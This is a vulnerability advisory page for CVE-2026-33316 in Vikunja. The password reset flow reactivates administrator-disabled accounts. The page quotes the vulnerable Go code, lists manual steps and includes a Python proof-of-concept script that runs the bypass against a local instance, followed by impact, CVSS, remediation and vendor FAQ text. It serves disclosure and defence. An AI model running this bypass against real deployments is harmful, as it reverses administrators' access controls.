Summary
A flaw in Vikunja’s password reset logic allows disabled users to regain access to their accounts. The ResetPassword() function sets the user’s status to StatusActive after a successful password reset without verifying whether the account was previously disabled. By requesting a reset token through /api/v1/user/password/token and completing the reset via /api/v1/user/password/reset, a disabled user can reactivate their account and bypass administrator-imposed account disablement.
Vulnerable Code Snippet
In pkg/user/user_password_reset.go, beginning at line 66:
// Hash the password
user.Password, err = HashPassword(reset.NewPassword)
if err != nil {
return
}
err = removeTokens(s, user, TokenPasswordReset)
if err != nil {
return
}
user.Status = StatusActive // <--- VULNERABILITY: Unconditionally sets status to Active
_, err = s.
Cols("password", "status").
Where("id = ?", user.ID).
Update(user)
if err != nil {
return
}
The code is vulnerable because it assumes that any user resetting their password is transitioning from a normal state or an "Email Confirmation Required" state into an "Active" state. It completely ignores whether the user was placed in the StatusDisabled state by an administrator.
Additionally, in the token request function (RequestUserPasswordResetTokenByEmail), the system fetches the user via GetUserWithEmail() which does not filter out disabled users, allowing them to legally request the token in the first place.
PoC (Proof of Concept)
Manual Exploitation Steps
- Create a standard user account in Vikunja.
- As an Administrator (or by modifying the database directly), disable the user account by setting their status to Disabled (
status = 2). - Attempt to log in as the disabled user to verify access is blocked (receives
HTTP 412: This account is disabled). - Without authenticating, send a
POSTrequest to/api/v1/user/password/tokenwith the disabled user's email address. - Retrieve the password reset token from the incoming email.
- Send a
POSTrequest to/api/v1/user/password/resetwith the token and a new password. - Log in using the new password. Observe that the login succeeds (
HTTP 200) and the account has been maliciously reactivated.
Automation PoC
import requests
import psycopg2
import time
import secrets
API_URL = "http://localhost:3456/api/v1"
def main():
username = f"testuser_{secrets.token_hex(4)}"
email = f"{username}@example.com"
password = "SuperSecretPassword123!"
print("[1] Registering user...")
requests.post(f"{API_URL}/register", json={"username": username, "email": email, "password": password})
print("[2] Admin disables account (Status = 2)...")
conn = psycopg2.connect(host="localhost", database="vikunja", user="vikunja", password="vikunja_password")
cursor = conn.cursor()
cursor.execute("UPDATE users SET status = 2 WHERE username = %s;", (username,))
conn.commit()
print("[3] Verifying login is blocked...")
res = requests.post(f"{API_URL}/login", json={"username": username, "password": password})
print(f"Login response: {res.status_code} (Should be 412)")
print("[4] Attacker requests password reset...")
requests.post(f"{API_URL}/user/password/token", json={"email": email})
print("[5] Attacker grabs token from email/DB...")
cursor.execute("SELECT id FROM users WHERE username = %s;", (username,))
user_id = cursor.fetchone()[0]
cursor.execute("SELECT token FROM user_tokens WHERE user_id = %s AND kind = 1 ORDER BY created DESC LIMIT 1;", (user_id,))
token = cursor.fetchone()[0]
print("[6] Attacker submits reset, triggering bug...")
new_password = "HackedPassword123!"
requests.post(f"{API_URL}/user/password/reset", json={"token": token, "new_password": new_password})
print("[7] Attacker logs in successfully!")
res = requests.post(f"{API_URL}/login", json={"username": username, "password": new_password})
print(f"Final Login response: {res.status_code} (Should be 200)")
cursor.execute("SELECT status FROM users WHERE username = %s;", (username,))
print(f"Final DB Status: {cursor.fetchone()[0]} (0 = Active)")
conn.close()
if __name__ == "__main__":
main()
Impact
- Authentication & Authorization Bypass: An attacker can unilaterally reverse an administrative security decision.
- Integrity & Confidentiality Impact: The attacker can regain full access to resources and functionality that were previously restricted due to the account being disabled.
The application does not perform an authorization check before performing a sensitive operation. Typical impact: unauthorized access to restricted functionality or data.
CVE-2026-33316 has a CVSS score of 8.1 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
In the interim: Keep the dependency up to date. Ensure authorization checks are enforced consistently on all sensitive operations.
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-33316? CVE-2026-33316 is a high-severity missing authorization vulnerability in code.vikunja.io/api (go), affecting versions <= 2.1.0. No fixed version is listed yet. The application does not perform an authorization check before performing a sensitive operation.
- How severe is CVE-2026-33316? CVE-2026-33316 has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of code.vikunja.io/api are affected by CVE-2026-33316? code.vikunja.io/api (go) versions <= 2.1.0 is affected.
- Is there a fix for CVE-2026-33316? No fixed version is listed for CVE-2026-33316 yet. Monitor the advisory for updates and apply mitigations in the interim.
- Is CVE-2026-33316 exploitable, and should I be worried? Whether CVE-2026-33316 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-33316 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-33316? No fixed version is listed yet. In the interim: Keep the dependency up to date. Ensure authorization checks are enforced consistently on all sensitive operations.